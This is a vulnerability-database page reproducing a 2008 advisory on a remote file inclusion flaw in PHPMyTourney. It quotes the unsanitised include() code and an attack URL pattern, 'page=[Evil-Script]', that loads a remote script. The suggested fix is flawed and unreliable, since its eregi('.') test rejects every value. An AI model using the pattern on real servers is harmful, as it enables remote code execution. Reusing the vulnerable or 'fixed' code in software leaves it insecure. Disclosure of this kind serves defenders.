Lucene search
K

phpmyt-rfi.txt

🗓️ 03 Mar 2008 00:00:00Reported by HACKERS PALType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

PHPMyTourney Remote file include Vulnerability discovered by Hackers Pal. Vulnerable file: phpmytourney/sources/tourney/index.php. Code vulnerability in line 45-49. Fast solution provided

Code
`Hello  
  
PHPMyTourney Remote file include Vulnerability  
  
Discovered By : HACKERS PAL  
Copy rights : HACKERS PAL  
Website : http://www.soqor.net  
Email Address : [email protected]  
  
home page : http://phpmytourney.sourceforge.net  
  
Script : PHPMyTourney  
  
  
vulnerable file : phpmytourney/sources/tourney/index.php  
  
code  
$page = $_GET['page'];  
if(isset($page))  
include($page . '.php');  
else  
echo("must specify a page ");  
lines 45-49  
  
fast solution  
replace with  
  
if(file_exists($page . '.php') and !eregi(".",$page) and !eregi(":",$page) and !eregi("/",$page))  
{  
include($page . '.php');  
}  
else  
{  
echo("must specify a page ");  
}  
  
phpmytourney/sources/tourney/index.php?page=[Evil-Script]  
  
  
  
#WwW.SoQoR.NeT  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation